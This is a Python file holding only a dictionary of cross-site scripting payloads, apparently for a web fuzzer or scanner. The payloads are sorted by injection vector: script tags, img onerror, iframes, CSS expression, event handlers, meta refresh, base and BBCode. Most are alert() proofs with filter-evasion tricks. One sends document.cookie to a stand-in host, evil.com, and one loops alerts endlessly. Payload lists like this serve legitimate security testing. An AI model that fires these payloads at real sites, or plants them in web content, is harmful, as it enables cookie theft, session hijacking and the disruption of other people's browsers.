#!/usr/bin/python

xss_sheet_cheat={
                 "script":[
                     "<script>alert(0);</script>",
                     "<script>alert('XSS');</script>",
                     "<script>location.href=\"http://www.evil.com/cookie.php?cookie=\"+escape(document.cookie)</script>",
                     "<scr<script>ipt>alert('XSS');</scr</script>ipt>",
                     "<script>alert(String.fromCharCode(88,83,83))</script>",
                     "\"><script>alert('XSS')</script>",
                     "</title><script>alert(/xss/)</script>",
                     "</textarea><script>alert(/XSS/)</script>",
                     "<? echo('<scr');echo('ipt>alert(\"XSS\")</script');?>",
                     "<marquee><script>alert('XSS')</script></marquee>",
                     "<script language=\"JavaScript\">alert('XSS')</script>",
                     "\"><script alert(String.fromCharCode(88,83,83))</script>",
                     "\'\">><script>alert('XSS')</script>",
                     "<script>var var=1;alert(var)</script>", 
                     "<?='<SCRIPT>alert(\"XSS\")</SCRIPT>'?>",
                     "<scrscriptipt>alert(1)</scrscriptipt>",
                     "</script><script>alert(1)</script>",
                     "'\"></title><script>alert(1111)</script>",
                     "</textarea>\'\"><script>alert(document.cookie)</script>",
                     "'\"\"><script language=\"JavaScript\">alert('X\nS\nS');</script>",
                     "</script></script><<<<script><>>>><<<script>alert(123)</script>",
                     "<html><noalert><noscript>alert(123)</script>",
                     "}</style><script>a=eval;a=eval;b=alert;a(b(/XSS/.source));</script>",
                     "<SCRIPT>document.write(\"XSS\");</SCRIPT>",
                     "='><script>alert(\"XSS\")</script>",
                     "<body background=javascript:'\"><script>alert(navigator.userAgent)</script></body>",
                     ">\"><script>alert(/XSS/)</script>",
                     "\"></title><script>alert(1)</script>",
                     "</div><script>alert(123)</script>",
                     "\"></iframe><script>alert(123)</script>",
                     "'></select><script>alert(123)</script>",
                 ],
                 "img":
                 [
                     "<img src=foo.png onerror=alert(/xss/) />",
                     "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
                     "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
                     "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
                     "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
                     "<IMG LOWSRC=\"javascript:alert('XSS')\">",
                     "<IMG DYNSRC=\"javascript:alert('XSS')\">",
                     "<img src=\"javascript:alert('XSS')\">",
                     "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
                     "\"<marquee><img src=k.png onerror=alert(/XSS/) />",
                     "\"<marquee><img src=k onerror=alert(/XSS/) />",
                     "'\"><marquee><img src=k.png onerror=alert(/XSS/.source) />",
                     "<img src=\"javascript:alert(\"XSS\")\">",
                     ">\"><img src=\"javascript:alert('XSS')\">",
                     "\"/></a></><img src=1.gif onerror=alert(1)>",
                     "window.alert(\"XSS\");",
                  ],
                 "iframe":
                 [
                    "<iframe<?php echo chr(11)?>onload=alert('XSS')></iframe>",
                    "\"><iframe src='javascript:alert(document.cookie)'></iframe>",
                  ],
                 "marquee":
                 [
                    "'>><marquee><h1>XSS</h1></marquee>",
                    "\'\">><marquee><h1>XSS</h1></marquee>",
                  ],
                 "attr-style":
                 [
                    "<font style='color:expression(alert(document.cookie))'>",
                    "<div style=\"x:expression((windows.r==1)?\":eval('r=1;alert(String.fromCharCode(88,83,83));'))\">",
                    "<div style=\"background:url('javascript:alert(1)')\">",
                    "\" style=\"background:url(javascript:alert(/XSS/))\"",
                    "</br style=a:expression(alert())>",
                  ],
                 "event":
                 [
                    "<body onunload=\"javascript:alert('XSS');\">",
                    "<body onLoad=\"alert('XSS');\">",
                      "\" onfous=alert(document.domain)\"><\"",
                      "\"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>",
                      "<body onLoad=\"while(true) alert('XSS');\">",
                      "<SELECT NAME=\"\" onmouseover=alert(123)></select>",
                      "'\"></title><font color=red onmouseover=javascript:alert(1337)>XSS</font>",
                  ],
                 "meta":
                 [
                      "<META HTTP-EQUIV='refresh' CONTENT='0;url=javascript:alert(/XSS/');\">",
                      "<META HTTP-EQUIV='refresh' CONTENT='0;URL=http://;URL=javascript:alert(/XSS/);'>",
                  ],
                 "base":
                 [
                         "<BASE HREF=\"javascript:alert('XSS');//\">",
                  ],
                 "frameset":
                 [
                        "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", 
                  ],
                 "other":[                 
                     "[url=javascript:alert('XSS');]click me[/url]",
                     "[color=red' onmouseover=\"alert('XSS')\"]mouse over[/color]",
                     "[color=red width=expression(alert(123))][color]",
                 ]}